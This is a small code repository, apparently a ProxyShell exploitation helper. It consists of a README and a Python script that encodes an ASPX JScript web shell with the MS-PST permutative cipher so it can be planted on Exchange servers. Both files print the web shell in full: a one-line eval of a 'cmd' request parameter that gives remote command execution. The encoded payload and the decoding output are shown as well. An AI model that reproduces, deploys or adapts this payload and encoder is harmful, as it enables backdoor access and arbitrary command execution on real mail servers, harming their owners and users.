├── README.md
└── proxyshell_payload.py


/README.md:
--------------------------------------------------------------------------------
 1 | # Py Permutative Encoding
 2 | https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-pst/5faf4800-645d-49d1-9457-2ac40eb467bd
 3 | 
 4 | ## Generate proxyshell payload
 5 | ```
 6 | ╰─❯ python Proxyshell-payload.py
 7 | [+] Encode webshell ⬇
 8 | ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoI5uanf2jmp1mlU041pqRT/FIb32tld9wZUFLfTBjm5qd/aKSDTqQ2MyenapanNjL7aXPfa1hR+glSNDYIPa4L3BtapXdqCyTEhlfvWVIa3aRTZ
 9 | 
10 | [+] Decode webshell ⬇
11 | <script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script>
12 | ```


--------------------------------------------------------------------------------
/proxyshell_payload.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | #coding: UTF-8
  3 | 
  4 | import base64
  5 | import six
  6 | from io import BytesIO
  7 | 
  8 | DWORD_SIZE = 4
  9 | 
 10 | mpbbCrypt = [
 11 |     65, 54, 19, 98, 168, 33, 110, 187,
 12 |     244, 22, 204, 4, 127, 100, 232, 93,
 13 |     30, 242, 203, 42, 116, 197, 94, 53,
 14 |     210, 149, 71, 158, 150, 45, 154, 136,
 15 |     76, 125, 132, 63, 219, 172, 49, 182,
 16 |     72, 95, 246, 196, 216, 57, 139, 231,
 17 |     35, 59, 56, 142, 200, 193, 223, 37,
 18 |     177, 32, 165, 70, 96, 78, 156, 251,
 19 |     170, 211, 86, 81, 69, 124, 85, 0,
 20 |     7, 201, 43, 157, 133, 155, 9, 160,
 21 |     143, 173, 179, 15, 99, 171, 137, 75,
 22 |     215, 167, 21, 90, 113, 102, 66, 191,
 23 |     38, 74, 107, 152, 250, 234, 119, 83,
 24 |     178, 112, 5, 44, 253, 89, 58, 134,
 25 |     126, 206, 6, 235, 130, 120, 87, 199,
 26 |     141, 67, 175, 180, 28, 212, 91, 205,
 27 |     226, 233, 39, 79, 195, 8, 114, 128,
 28 |     207, 176, 239, 245, 40, 109, 190, 48,
 29 |     77, 52, 146, 213, 14, 60, 34, 50,
 30 |     229, 228, 249, 159, 194, 209, 10, 129,
 31 |     18, 225, 238, 145, 131, 118, 227, 151,
 32 |     230, 97, 138, 23, 121, 164, 183, 220,
 33 |     144, 122, 92, 140, 2, 166, 202, 105,
 34 |     222, 80, 26, 17, 147, 185, 82, 135,
 35 |     88, 252, 237, 29, 55, 73, 27, 106,
 36 |     224, 41, 51, 153, 189, 108, 217, 148,
 37 |     243, 64, 84, 111, 240, 198, 115, 184,
 38 |     214, 62, 101, 24, 68, 31, 221, 103,
 39 |     16, 241, 12, 25, 236, 174, 3, 161,
 40 |     20, 123, 169, 11, 255, 248, 163, 192,
 41 |     162, 1, 247, 46, 188, 36, 104, 117,
 42 |     13, 254, 186, 47, 181, 208, 218, 61,
 43 |     20, 83, 15, 86, 179, 200, 122, 156,
 44 |     235, 101, 72, 23, 22, 21, 159, 2,
 45 |     204, 84, 124, 131, 0, 13, 12, 11,
 46 |     162, 98, 168, 118, 219, 217, 237, 199,
 47 |     197, 164, 220, 172, 133, 116, 214, 208,
 48 |     167, 155, 174, 154, 150, 113, 102, 195,
 49 |     99, 153, 184, 221, 115, 146, 142, 132,
 50 |     125, 165, 94, 209, 93, 147, 177, 87,
 51 |     81, 80, 128, 137, 82, 148, 79, 78,
 52 |     10, 107, 188, 141, 127, 110, 71, 70,
 53 |     65, 64, 68, 1, 17, 203, 3, 63,
 54 |     247, 244, 225, 169, 143, 60, 58, 249,
 55 |     251, 240, 25, 48, 130, 9, 46, 201,
 56 |     157, 160, 134, 73, 238, 111, 77, 109,
 57 |     196, 45, 129, 52, 37, 135, 27, 136,
 58 |     170, 252, 6, 161, 18, 56, 253, 76,
 59 |     66, 114, 100, 19, 55, 36, 106, 117,
 60 |     119, 67, 255, 230, 180, 75, 54, 92,
 61 |     228, 216, 53, 61, 69, 185, 44, 236,
 62 |     183, 49, 43, 41, 7, 104, 163, 14,
 63 |     105, 123, 24, 158, 33, 57, 190, 40,
 64 |     26, 91, 120, 245, 35, 202, 42, 176,
 65 |     175, 62, 254, 4, 140, 231, 229, 152,
 66 |     50, 149, 211, 246, 74, 232, 166, 234,
 67 |     233, 243, 213, 47, 112, 32, 242, 31,
 68 |     5, 103, 173, 85, 16, 206, 205, 227,
 69 |     39, 59, 218, 186, 215, 194, 38, 212,
 70 |     145, 29, 210, 28, 34, 51, 248, 250,
 71 |     241, 90, 239, 207, 144, 182, 139, 181,
 72 |     189, 192, 191, 8, 151, 30, 108, 226,
 73 |     97, 224, 198, 193, 89, 171, 187, 88,
 74 |     222, 95, 223, 96, 121, 126, 178, 138,
 75 |     71, 241, 180, 230, 11, 106, 114, 72,
 76 |     133, 78, 158, 235, 226, 248, 148, 83,
 77 |     224, 187, 160, 2, 232, 90, 9, 171,
 78 |     219, 227, 186, 198, 124, 195, 16, 221,
 79 |     57, 5, 150, 48, 245, 55, 96, 130,
 80 |     140, 201, 19, 74, 107, 29, 243, 251,
 81 |     143, 38, 151, 202, 145, 23, 1, 196,
 82 |     50, 45, 110, 49, 149, 255, 217, 35,
 83 |     209, 0, 94, 121, 220, 68, 59, 26,
 84 |     40, 197, 97, 87, 32, 144, 61, 131,
 85 |     185, 67, 190, 103, 210, 70, 66, 118,
 86 |     192, 109, 91, 126, 178, 15, 22, 41,
 87 |     60, 169, 3, 84, 13, 218, 93, 223,
 88 |     246, 183, 199, 98, 205, 141, 6, 211,
 89 |     105, 92, 134, 214, 20, 247, 165, 102,
 90 |     117, 172, 177, 233, 69, 33, 112, 12,
 91 |     135, 159, 116, 164, 34, 76, 111, 191,
 92 |     31, 86, 170, 46, 179, 120, 51, 80,
 93 |     176, 163, 146, 188, 207, 25, 28, 167,
 94 |     99, 203, 30, 77, 62, 75, 27, 155,
 95 |     79, 231, 240, 238, 173, 58, 181, 89,
 96 |     4, 234, 64, 85, 37, 81, 229, 122,
 97 |     137, 56, 104, 82, 123, 252, 39, 174,
 98 |     215, 189, 250, 7, 244, 204, 142, 95,
 99 |     239, 53, 156, 132, 43, 21, 213, 119,
100 |     52, 73, 182, 18, 10, 127, 113, 136,
101 |     253, 157, 24, 65, 125, 147, 216, 88,
102 |     44, 206, 254, 36, 175, 222, 184, 54,
103 |     200, 161, 128, 166, 153, 152, 168, 47,
104 |     14, 129, 101, 115, 228, 194, 162, 138,
105 |     212, 225, 17, 208, 8, 139, 42, 242,
106 |     237, 154, 100, 63, 193, 108, 249, 236
107 | ]
108 | 
109 | mpbbR = mpbbCrypt
110 | mpbbS = mpbbCrypt[256:]
111 | mpbbI = mpbbCrypt[512:]
112 | 
113 | 
114 | def cryptpermute(data, encrypt=False):
115 |     table = mpbbR if encrypt else mpbbI
116 |     tmp = [table[v] for v in data] if six.PY3 else [table[ord(v)] for v in data]
117 |     i = 0
118 |     buf = bytes(tmp) if six.PY3 else bytearray(tmp)
119 |     stream = BytesIO(buf)
120 |     while True:
121 |         b = stream.read(DWORD_SIZE)
122 |         try:
123 |             tmp[i] = b[0]
124 |             tmp[i + 1] = b[1]
125 |             tmp[i + 2] = b[2]
126 |             tmp[i + 3] = b[3]
127 |             i += DWORD_SIZE
128 |         except:
129 |             pass
130 |         if len(b) != DWORD_SIZE:
131 |             break
132 | 
133 |     return bytes(tmp) if six.PY3 else ''.join(tmp)
134 | 
135 | if __name__ == "__main__":
136 |     webshell = b"<script language='JScript' runat='server' Page aspcompat=true>function Page_Load(){eval(Request['cmd'],'unsafe');}</script>"
137 |     v1 = cryptpermute(webshell, False)
138 |     b64_data = base64.b64encode(v1).decode()
139 |     print("[+] Encode webshell ⬇\n{}\n".format(b64_data))
140 | 
141 |     encode_shell = base64.b64decode(b64_data)
142 |     decode_shell = cryptpermute(encode_shell, True)
143 |     print("[+] Decode webshell ⬇\n{}\n".format(decode_shell.decode()))


--------------------------------------------------------------------------------